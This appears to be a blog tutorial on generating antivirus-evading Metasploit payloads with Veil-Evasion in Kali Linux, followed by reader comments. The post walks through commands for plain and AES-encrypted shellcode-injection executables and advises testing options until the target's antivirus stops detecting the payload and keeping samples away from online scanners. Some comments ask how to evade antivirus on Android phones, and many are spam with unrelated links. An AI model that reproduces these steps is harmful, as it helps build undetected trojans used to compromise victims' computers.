Prerequisites
You should know how the basics of generating payloads using metasploit, i.e. have a basic idea about pentesting. I have covered these already, and won't do so again.If you haven't got the prerequisites covered, I'd suggesting you start by hacking into an unpatched Windows XP machine.
Install Veil-evasion
This is one the rare moments when you actually have to install a hacking tool in Kali Linux. That said, the process is incredibly simple, and a simple apt-get will work.sudo apt-get update
sudo apt-get install veil-evasion
Type veil-evasion in the terminal and you'll be asked if you want to continue with the installation.
Veil Evasion - Creating a simple payload
Type veil-evasion on the terminal to start it.
list2) Use any payload you want to. I'm using python/shellcode_inject/flat. Type
use python/shellcode_inject/flat
info4) Type generate
generate
7) Enter LHOST (listener IP, i.e. your IP from ifconfig) and LPORT (any unused port works), enter any extra msfoptions you want to enter (not required here). Enter any name you want.
Your payload will get generated in a bit. Don't upload it to online scanners, since they distribute it to different AV companies and the detection rate increases.
PS: If you are having issues, scroll down to the troubleshooting section below.
Veil Evasion - Creating An encrypted payload
Let's try to create an encypted payload, one which will be undetectable by most AVs.We'll use AES encryption to encrypt the payload. This is a pretty strong algorithm and should provide pretty low detection rate.
1) Select the payload (this step is the only difference between the encrypted payload and simple payload)
use python/shellcode_inject/aes_encrypt
 |
| Don't be confused by the directory at which I currently am in (/Veil-Evasion/Setup) in all the screenshots. I created a troubleshooting section below for which I was in this directory, and never switched back to home directory. This doesn't change anything. |
info
4) Generate the encrypted payload.
generate5) Choose option 1, press enter for default payload. Follow the same procedure as the previous case. Choose the LHOST, LPORT.
7) Choose 1 (pyinstaller).
Generated executable can be seen here-
/usr/share/veil-output/compiled/veiled.exe
 |
| This is the second payload I created with the name veiled so it got changed to veiled1.exe |
Troubleshooting
If you're getting this error
ERROR: Can't find python.exe in /root/.config/wine/veil/drive_c/Python27/
Then it means apt-get failed you, and there are some uninstalled/mis-configured dependencies
Try this solution-
git clone https://github.com/Veil-Framework/Veil-Evasion.gitIt's going to be approximately a 300 MB download.
then
cd Veil-Evasion/setup/then
./setup.sh -c
 |
| This step may take some time. You'll have to wait. |
 |
| You'll have to install a lot of stuff including python, ruby, etc. with Wine |
then
cd ../setup/then
python update.pyThis should fix the issues.
Tinkering
I just generated an encrypted payload without a lot of tinkering. You can play with the options, try out everything that veil offers, and get a much more 'veiled' payload. As far as bypassing antiviruses is concerned, experimentation is key. Keep trying out different options till one generates a payload that your target AV won't detect.
What to expect
Imagine your created payload is FUD (fully undetectable). Let's reiterate the steps you performed-
- Figured out how to use Kali (live USB, dual boot, VM, doesn't matter).
- Completed the steps given in a very easy to follow tutorial (I hope it was easy to follow).
Now ask yourself how hard it was to do the above steps, and how many people would be able to do it. Let's say 1 in every 100 persons who tries to do the steps 1 and 2 succeeds. This would mean, one in every 100 persons who wants to write a virus/payload/trojan that cannot be detected by any antivirus, would succeed. Would you want to live in a world where there are viruses which can't be detected by AVs, and these can be created by anyone with a bit of brain, internet access, and odds (1 against 100) in his favor?
Obviously not. The antivirus companies constantly keep evolving their algos, and the good ones would detect veil payloads. If you are clever, you can make the payload such that it's detected only by very few AVs, but making a completely undetectable payload is hard, as it should be. There are crypters available, which are not free of cost, which encrypt your payloads, and then they are FUD for a short while at least. However, just like searching google for hack facebook and typing the username on a bogus website doesn't give you the password of a facebook account, simple stuff like this won't make an invincible payload. However, since you did do a lot of genuine work, the payload can certainly bypass a lot of common AVs, and with a bit of effort, you can probably make it almost FUD.
So no, your payload won't be perfect, and yes, it's a good thing.
It should be apt-get install veil-evasion. Just missing the dash between veil and evasion.
ReplyDeleteThanks, updated.
DeleteMine says "E: Unable to locate package veil-evasion" (oobvuously with dash)
DeleteYes, it should be.
DeleteMine said unable locate
ReplyDeleteapt-get install veil-evasion
Deletecan i use any ip address ???
ReplyDeleteNope, it has to be your own one... LHOST is for Local Host which is your ip address, and if you do any remote hacking then you will have to specify the victims ip address which is RHOST for remote host.
DeleteI get an index error while trying to generate:
ReplyDeleteFile "./Veil-evasion.py", line 342, in
controller.MainMenu(args=args)
File "/usr/share/veil-evasion/modules/common/controller.py", line881, in Main
Menu
self.outputFileName = self.PayloadMenu*self.payload, args=args)
File "/usr/share/veil-evasion/modules/common/controller.py", libne 797, in PayloadMenu
payloadCode = payload.generate()
File "/usr/share/veil-evasion/modules/payloads/python/shellcode_inject/flat.py", line 53, in generate
Shellcode = self.shellcode.generate(self.required_options)
File "/usr/share/veil-evasion/modules/common/controller.py", line 482, in generate
self.menu()
File "/usr/share/veil-evasion/modules/common/controller.py", line 448, in menu
final_opt = xtra_opt.split('=')[0] + "=" + xtra_opt.split('=')[1]
IndexError: list index out of range
My payload has been detected by avast aitivirus
ReplyDeleteI don't know how
I use Python to make payload
And I have tried all python codes and all are detecting by Av
Replay to this
top AV can detect any payload you are generating..
Deletewhat you have seen on the internet tutorials are not consistent.
they use low profile AV so that the payloads able to evade..
Avast internet security, premier and other top rated AV will detect your payload.
expectation vs reality..
Those having problems with unable to locate package have to update their source list!
ReplyDeleteAwesome Tut! Thanks OP!
ReplyDeletei used proxy server and how to update
ReplyDeletehttp://goo.gl/8V5QvW
ReplyDelete[!] ERROR: Can't find python.exe in /root/.config/wine/veil/drive_c/Python27/
ReplyDelete[!] ERROR: Make sure the python.exe binary exists before using PyInstaller.
(I'm using an Virtual Machine using Kali Linux 2.0)
how are u folks? i just want to know wich is the best way to make payloads and evade android phones AVs... does Veil Evasion payloads work for android meterpreter too??
ReplyDeleteVi /etc/apt/sources.list
ReplyDeletedeb http://http.kali.org/kali kali-rolling main non-free contrib
OMG! PAYLOAD WAS detected by FortiClient ! any new PAYLOAD DO YOU HAVE NOT DETECTED !
ReplyDeleteAfter you have downloaded and introduced Revo Uninstaller, utilize it to uninstall your current antivirus program. antivirus software reviews
ReplyDeletewhy would i (and i don't )want to install WINE on my Linux machine for one program designed FOR Linux????
ReplyDeleteCPU asset is presently being utilized on your framework, so you can contrast it with the memory and CPU utilization of your preliminary antivirus suites. mouse click the next page
ReplyDeleteAlong these lines, it is best to have another sort of Windows antivirus programming on your PC. Wearable Tech Blogs
ReplyDeleteIn vast American and Canadian freely recorded partnerships, a company secretary is ordinarily named a Corporate Secretary or Secretary. American Audio Visual
ReplyDeleteIn the event that you don't have any antivirus programming as of now introduced on your PC and you have been surfing the web antivirus coupon
ReplyDeleteHello I am so delighted I located your blog, I really located you by mistake, while I was watching on google for something else, Anyways I am here now and could just like to say thank for a tremendous post and a all round entertaining website. Please do keep up the great work. quick heal antivirus buy online
ReplyDeleteMua vé máy bay tại Aivivu, tham khảo
ReplyDeletevé máy bay đi Mỹ giá rẻ
giá vé về việt nam
thời gian bay từ nhật về vn
lich bay tu duc ve viet nam
khi nào có chuyến bay từ canada về việt nam
Máy bay từ Hàn Quốc về Việt Nam
khách sạn cách ly hà nội
Chuyến bay cho chuyên gia nước ngoài
A very useful post, and I truly appreciate the information. I'm looking forward to reading more intriguing articles like this. I wanted to express my gratitude for this wonderful read!! I thoroughly liked every minute of it. Continue your excellent job! Many people are looking for this information, and you may substantially assist them.
ReplyDeletedissolve protective order Virginia
such wonderful article! I would you like to appreciated for your useful post and hereafter i must follow your blog. please update your content and thanks alot for giving the best post.
ReplyDeleteKeep it up!!!
abogados de bancarrota playa de virginia
ReplyDeleteThis is an informative blog by which I have got that info which I really wanted to get.
ReplyDeleteI’m so lucky that I have got this site that imparted me the high quality of information easily.
ReplyDeleteExcellent post. Keep posting such kind of information on your page.
This blog is so nice for me. I will keep on coming here again and again.
ReplyDeleteThis blog post is such a refreshing read! The content is not only informative but also incredibly engaging. I love how the author presents their ideas with clarity and passion. Keep up the great work! 😊👍
ReplyDeleteDavis Cup is the top international team competition. It is organized by the International Tennis Federation (ITF) and Watch Davis Cup Final live online features yearly competition between teams from more than 140 nations. The organizers call it the World Cup of Tennis, and the victors are called the World Champions.
ReplyDeleteI'm constantly impressed by the depth and clarity of your blog posts. Your dedication to providing valuable information shines through in every article. Your blog serves as a reliable source of inspiration and learning. I truly value the effort you put into creating such informative and enjoyable content.New Jersey Domestic Violence Attorney and New Jersey Domestic Violence Act
ReplyDeleteWhat a thoughtful and insightful post! Thank you for sharing with us. Now try to play the game with me.
ReplyDeleteWhen it comes to plumbing services in Houston, commercial plumbers play a vital role in ensuring that businesses operate smoothly. These skilled professionals specialize in a wide range of plumbing tasks tailored specifically for commercial properties, including restaurants, office buildings, and retail spaces. Their expertise encompasses everything from routine maintenance and emergency repairs to the installation of complex plumbing systems.
ReplyDeleteWith a deep understanding of local codes and regulations, commercial plumbers in Houston are equipped to handle the unique challenges that arise in larger-scale plumbing projects, ensuring that businesses remain compliant and efficient.